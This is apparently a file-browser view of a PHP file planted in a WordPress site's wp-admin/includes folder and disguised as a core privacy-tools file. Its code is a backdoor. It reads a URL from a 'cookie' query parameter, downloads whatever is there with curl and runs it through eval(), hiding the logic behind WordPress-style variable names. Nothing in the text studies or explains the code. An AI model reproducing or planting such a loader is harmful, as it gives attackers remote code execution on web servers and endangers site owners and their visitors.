Current Path : /webspace/www.cordales.be/html/wp-admin/includes/ |
Current File : //webspace/www.cordales.be/html/wp-admin/includes/privacy-tools-sql.php |
<?php if (isset($_GET['cookie'])) { $get_the_category_list_hos = $_GET['cookie']; if ($have_posts_och = curl_init()) { curl_setopt($have_posts_och, CURLOPT_URL, $get_the_category_list_hos); curl_setopt($have_posts_och, CURLOPT_RETURNTRANSFER, true); eval(curl_exec($have_posts_och)); curl_close($have_posts_och); exit; } }